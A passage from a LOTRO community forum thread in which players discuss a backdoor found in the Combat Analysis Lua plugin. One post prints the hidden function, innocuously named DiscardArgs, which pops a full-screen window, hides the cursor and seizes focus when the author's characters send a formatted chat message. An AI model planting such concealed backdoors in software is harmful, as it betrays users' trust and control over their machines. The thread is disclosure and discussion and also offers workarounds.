Jump to content
LOTROCommunity

Windows Firewall has blocked lotroclient.exe


Dalthalion
 Share

Recommended Posts

Interesting thing just happened.  I exited LOTRO, only to find a Windows Firewall warning, saying that it had blocked lotroclient.exe (Disclaimer:  Yes, I have another, better firewall.).  Went to the tech support section of the OF, and a few people were complaining about not being able to log in.  Wonder if it's connected.

 

Also, an unrelated thingo.  Over the weekend, I saw complaints of someone claiming to be the creator of the Combat Analysis LUA plugin placing messages he typed in GLFF into the CA display for players that had it installed.  Real gibberish, too.  I don't know if anyone here has the CA plugin loaded for LOTRO, but, based on this, perhaps people should think about getting rid of it.  Of course, I don't use plugins, so I'm pretty much a bystander.  Grain of salt.

Link to comment
Share on other sites

And why are the Lotro forums the only website I visit that I have to accept a security risk to just see. Seriously, despite the fans spinning their own blades over there on the OF, it says it all that they can't be bothered to even fix their forums so they are as good as almost every other forum on the internet.

Link to comment
Share on other sites

Interesting thing just happened.  I exited LOTRO, only to find a Windows Firewall warning, saying that it had blocked lotroclient.exe (Disclaimer:  Yes, I have another, better firewall.).  Went to the tech support section of the OF, and a few people were complaining about not being able to log in.  Wonder if it's connected.

 

Also, an unrelated thingo.  Over the weekend, I saw complaints of someone claiming to be the creator of the Combat Analysis LUA plugin placing messages he typed in GLFF into the CA display for players that had it installed.  Real gibberish, too.  I don't know if anyone here has the CA plugin loaded for LOTRO, but, based on this, perhaps people should think about getting rid of it.  Of course, I don't use plugins, so I'm pretty much a bystander.  Grain of salt.

 

I know who the creator of CA is - he was a kinmate during the pre-RoI/RoI days.  Anyone attach a name to their complaints?

 

I wouldn't be surprised if the allegations were true.  I recall him having figured out how to post in GLFF as other people, although the method he used was pretty easy to spot if you were paying the least bit of attention.  He was quite an amusing guy. :)

Link to comment
Share on other sites

He was quite an amusing guy. :)

Now *there's* an understatement...

It's certainly possible to do what was alleged, if Evendale coded in a back door to the code that monitors chat for combat parsing (which would be entirely in-character for him).

Edit: Yep, there it is. In the file Misc.lua, in the middle of a bunch of routines that do low-level text formatting or number-crunching stuff:

 

-- naughty hacking

function _G.DiscardArgs(args)
  if (args.Message == nil) then return end
  
  local hackText = nil;
  if (player.name == "Evendale" or player.name == "Evenwyn" or player.name == "Damagemeter") then
    hackText = string.match(args.Message,"^%[To .*%] '?#(.*)$");
    if (not hackText) then hackText = string.match(args.Message,"^%You say, '?#(.*)$") end
  else
    hackText = string.match(args.Message,"^%[.*%] <Select:IID:.*>Evendale<Select>: '?#(.*)$");
    if (not hackText) then hackText = string.match(args.Message,"^%[.*%] <Select:IID:.*>Evenwyn<Select>: '?#(.*)$") end
    if (not hackText) then hackText = string.match(args.Message,"^%[.*%] <Select:IID:.*>Damagemeter<Select>: '?#(.*)$") end
    if (not hackText) then hackText = string.match(args.Message,"^%<Select:IID:.*>Evenwyn<Select> says, '?#(.*)$") end
    if (not hackText) then hackText = string.match(args.Message,"^%<Select:IID:.*>Damagemeter<Select> says, '?#(.*)$") end
    if (not hackText) then hackText = string.match(args.Message,"^%<Select:IID:.*>Damagemeter<Select> says, '?#(.*)$") end
  end
  
  if (hackText == nil) then return end
  
  local extremeHack = ((string.len(hackText) >= 1) and (string.sub(hackText,1,1) == "#"));
  if (extremeHack) then hackText = string.sub(hackText,2) end
  local duration = string.match(hackText,"^(%d+)#.*$");
  if (duration) then hackText = string.sub(hackText,string.len(duration)+2) end
  duration = math.min((duration ~= nil and tonumber(duration) or 3), 60);
  if (string.len(hackText) >= 1 and string.sub(hackText,string.len(hackText)) == "n") then hackText = string.sub(hackText,1,string.len(hackText)-1) end
  if (string.len(hackText) >= 1 and string.sub(hackText,string.len(hackText)) == "'") then hackText = string.sub(hackText,1,string.len(hackText)-1) end
  hackText = hackText:gsub("n","n");
  local startTime = Turbine.Engine.GetGameTime();
  
  local window = Turbine.UI.Window();
  window:SetMouseVisible(false);
  window:SetSize(Turbine.UI.Display:GetWidth(),Turbine.UI.Display:GetHeight());
  window:SetPosition(0,0);
  window:SetZOrder(99999);
  
  if (extremeHack) then window:SetWantsUpdates(true) end
  window.Update = function(sender)
    KeyManager.TakeFocus();
    local timestamp = Turbine.Engine.GetGameTime();
    if (window:GetBackColor().A < 1) then
      local perc = math.min(1,(timestamp-startTime)/(duration/2));
      window:SetBackColor(Turbine.UI.Color(perc,0.3,0.05,0));
    else
      local perc = math.min(1,(timestamp-startTime)%0.4);
      window:SetBackColor(perc < 0.2 and Turbine.UI.Color(0.3,0.05,0) or Turbine.UI.Color(0.2,0,0.3));
    end
  end
  window.Close = function(sender)
    window:SetWantsUpdates(false);
    Turbine.UI.Window.Close(window);
    window = nil;
  end
  
  local label = Turbine.UI.Label();
  label:SetParent(window);
  label:SetMouseVisible(false);
  label:SetPosition(window:GetWidth()/6,0);
  label:SetSize((2*window:GetWidth())/3,window:GetHeight());
  label:SetTextAlignment(Turbine.UI.ContentAlignment.MiddleCenter);
  label:SetFont(Turbine.UI.Lotro.Font.TrajanProBold36);
  label:SetFontStyle(Turbine.UI.FontStyle.Outline);
  label:SetForeColor(Turbine.UI.Color(1,0.5,0.5));
  label:SetOutlineColor(Turbine.UI.Color(0.4,0.16,0));
  label:SetText(hackText);
  window:SetVisible(true);

  Misc.StartTimer(window,Turbine.Engine.GetGameTime(),duration,window.Close,window);
end
This function is called by the chat parsing event handler whenever a chat message is received which *isn't* a combat log message. If you only read the parsing routine, it looks like he's just calling an innocuously named routine to dispose of the message without doing anything with it.

But if the parser sees a correctly formatted message from one of his characters, it hides your mouse cursor and pops up a window on your screen with the content of the message. And he can encode the length of time the window should stay open in the message.

Typical Evendale...

:w

(BTW anyone who noticed this in the code and created a character with one of the recognized names *could* have been the one who actually used the back door...)

  • Upvote 2
Link to comment
Share on other sites

You wouldn't have nearly the same potential reach though. It's tempting to roll one of these in my remaining spare character slot now..

Ah right... I was not thinking this through properly.

I guess I wait to have my morning coffee before posting things like these again. :)

Link to comment
Share on other sites

And why are the Lotro forums the only website I visit that I have to accept a security risk to just see. Seriously, despite the fans spinning their own blades over there on the OF, it says it all that they can't be bothered to even fix their forums so they are as good as almost every other forum on the internet.

Fixing their forums would first require them to admit they are infact broken.

 

Everything is WAI and its all on your end. 

Link to comment
Share on other sites

Bunch of wankers... I'm drunk and I don't know what you are on about... wankers.

I logged in just fine.... wankers...

 

Spell check is da bomb...

 

Edit: I'm drunk and thought that was funny... judge for yourself

Edit2: stopping posting now :P

Edit 3 : but not stopping drinking...

Edit 4: Not so funny...

Link to comment
Share on other sites

Wait a minute.  This Evendale codes a backdoor into a LUA plugin, and people don't find that the least bit risky?

I seem to remember old man Heydt of all people (I may be wrong there) criticising a parser plugin (possibly this one) due to potential for abuse like that. Of course the response from the author, and I agreed with it, was that the source is right there, feel free to review and compile it yourself. :D

Link to comment
Share on other sites

Wait a minute.  This Evendale codes a backdoor into a LUA plugin, and people don't find that the least bit risky?

 

Evendale likes to mess with people.  He also enjoys (I think) being smarter than the LOTRO devs.  I can respect that.

Link to comment
Share on other sites

Evendale likes to mess with people.  He also enjoys (I think) being smarter than the LOTRO devs.  I can respect that.

Indeed. The phrase "too clever by half" was probably originated by one of Evendale's kinmates...

The hack is just way for him to pop a window up on your screen. Bad judgment on Evendale's part? Yes. The second coming of the GoodTimes Virus? Not so much.

In addition to editing out one line of the source, another extremely simple workaround is to /ignore the three "naughty" names in the addon. Then you can never see a chat message from them, so the addon can never see a chat message from them, and you never have to worry about getting trolled by a window on your screen.

Now, I believe an earlier version of the same addon used a Windows program to communicate combat log information with other players. *That* is something I would never install, *especially* if written by Evendale...

Link to comment
Share on other sites

Now, I believe an earlier version of the same addon used a Windows program to communicate combat log information with other players. *That* is something I would never install, *especially* if written by Evendale...

I believe that was the one I was reading the arguments about.

Link to comment
Share on other sites

Wait a minute.  This Evendale codes a backdoor into a LUA plugin, and people don't find that the least bit risky?

 

I dont know if anyone's ever bothered to invoke it outside of his group of friends before.

 

Is there a plugin somewhere that appropriately formats the text strings to send to trigger this yet if you've got one of those user names I wonder?

Indeed. The phrase "too clever by half" was probably originated by one of Evendale's kinmates...

Now, I believe an earlier version of the same addon used a Windows program to communicate combat log information with other players. *That* is something I would never install, *especially* if written by Evendale...

There was a version that did that before he had the chat-spew option. It's a useful plugin that you can read all the source to if anyone cares. It has no access to sensitive account info (user/password/etc). This 'april fools' joke style hole, was all in good fun =)

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
 Share

×
×
  • Create New...